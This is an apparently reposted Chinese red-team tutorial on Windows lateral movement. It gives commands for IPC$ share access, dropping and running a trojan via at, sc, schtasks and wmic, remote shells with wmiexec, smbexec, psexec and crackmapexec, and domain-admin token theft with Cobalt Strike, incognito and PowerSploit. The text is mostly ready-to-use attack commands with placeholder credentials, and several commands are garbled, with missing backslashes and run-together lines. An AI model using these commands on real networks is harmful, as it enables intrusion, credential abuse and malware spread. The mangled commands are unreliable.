常用的横向手法

admin
admin
admin
146004
文章
119
评论
2025年6月14日01:23:40评论23 views字数 2396阅读7分59秒阅读模式

常用的横向手法

概览
建立IPC连接、atexec、sc、schtasks、wmic、wmiexec、smbexec、psexec、crackmapexec、令牌盗用、incognito、powersploit、总结。

建立IPC连接

IPC:Internet Process Connection用来建立共享访问管道。在获取某个用户的账号密码后可建立IPC连接进行横向。

最好是管理员权限,普通用户的话,一些操作可能会受限。

后续以administrator为例演示,命令如下:

# 建立IPC连接net use \x.x.x.xipc$ password /user:domainadministrator# 查看已建立的连接net use# 列出目标机C盘目录dir \x.x.x.xc$

常用的横向手法

IPC连接也能做很多操作,比如映射磁盘,映射后可以对文件进行增删改查。

# 映射磁盘net use f: \x.x.x.xc$

常用的横向手法

除了映射,也可以使用copy命令把马儿复制到目标机:

# 将本地c盘下的exe文件复制到目标机copy c:exe.exe \x.x.x.xc$

常用的横向手法

随后可以查看下目标机时间,然后通过at命令去执行,当然at适用的是老机器:

# 查看目标机时间net time \x.x.x.x# at命令运行exeat \x.x.x.x cmd.exe /c "start /b c$:exe.exe"

常用的横向手法

atexec

atexec支持运行命令,返回的是system权限,命令如下:

atexec.exe domain/administrator:password@x.x.x.x whoami

常用的横向手法

sc

sc可在目标机建一个服务,通过该服务来运行马儿或执行命令,命令如下:

sc \x.x.x.x create systemed binpath="cmd.exe /c whoami" start=auto

常用的横向手法

schtasks

schtasks用来创建定时任务,at命令不支持,可以使用此命令,该命令可获取system权限,相关命令如下:

schtasks /create /s x.x.x.x /u radministrator /p "password" /tn test /sc DAILY /tr "cmd.exe" /c whoami>c:syslog.log /ru system /fschtasks /run /s x.x.x.x /u domainadministrator /p "password" /tn "test" /ischtasks /delete /s x.x.x.x /u domainadministrator /p "password" /tn "test" /f

常用的横向手法

wmic

wmic在有账号密码的情况下也可以在目标机执行命令,权限这里测试获取到的是administrator(和执行当前命令的用户权限一致):

wmic /node:x.x.x.x /user:domainadministrator /password:xxxxx process call create "cmd.exe /c whoami > c:wmic-whoami.txt"

常用的横向手法

常用的横向手法

wmiexec

这个这里直接用kali的py脚本做测试,它会返回一个交互式shell,命令如下:

wmiexec.py domain/administrator:'password'@x.x.x.x

如果密码带有特殊符号,则需要使用单引号包住:

常用的横向手法

smbexec

smbexec也会返回一个交互式shell,权限是system,格式用法和wmiexec一样,命令如下:

smbexec.py domain/administrator:'password'@x.x.x.x

常用的横向手法

psexec

psexec用法和wmiexec、smbexec一样,也会返回一个交互式shell,权限为system,但psexec会向服务器写文件,命令如下:

psexec.py domain/administrator:'password'@x.x.x.x

常用的横向手法

crackmapexec

crackmapexec工具也很好用,在知道账户和密码的情况下,可通过u直到用户名,p指定密码,x指定命令,命令如下:

crackmapexec map x.x.x.x -u administrator -p password -x whoami

常用的横向手法

令牌盗用

令牌盗用有个前提是要为system权限,权限低的话,是没有办法从内存中获取令牌的,这里的PC-JIXI上线了个system,通过ls查看域控目录是不行的:

常用的横向手法

通过ps查看以域管身份启动的进程,通过该进程去获取令牌,一般可以先找domainadministrator这种格式,除去常见的系统服务名外,也要注意其它的用户名,会有多个域管的存在或者是域管改名的情况:

常用的横向手法

这里有个cmd的进程是域管权限,pid是5296:

常用的横向手法

利用CS的steal_token命令跟pid来窃取令牌,命令执行后,可以成功访问到域控的c盘目录:

常用的横向手法

incognito

对于窃取令牌,incognito工具也可以,相关命令如下:

# 列出机器上的令牌incognito list_tokens -u

常用的横向手法

其结果中有system权,可以利用execute参数进行权限升级:

incognito execute -c "NT AUTHORITYSYSTEM" cmd.exe

当然,上面命令中的system也可以换成administrator,这样权限就会降回去:

incognito execute -c "AFAAdministrator" cmd.exe

常用的横向手法

PowerSploit

令牌窃取还有个PS脚本,属于PowerSploit,地址如下:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1

总结

横向方式多种多样,先记下这些常用的,后续文章再继续补充。

原文始发于微信公众号(aFa攻防实验室):常用的横向手法

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月14日01:23:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   常用的横向手法http://cn-sec.com/archives/819397.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息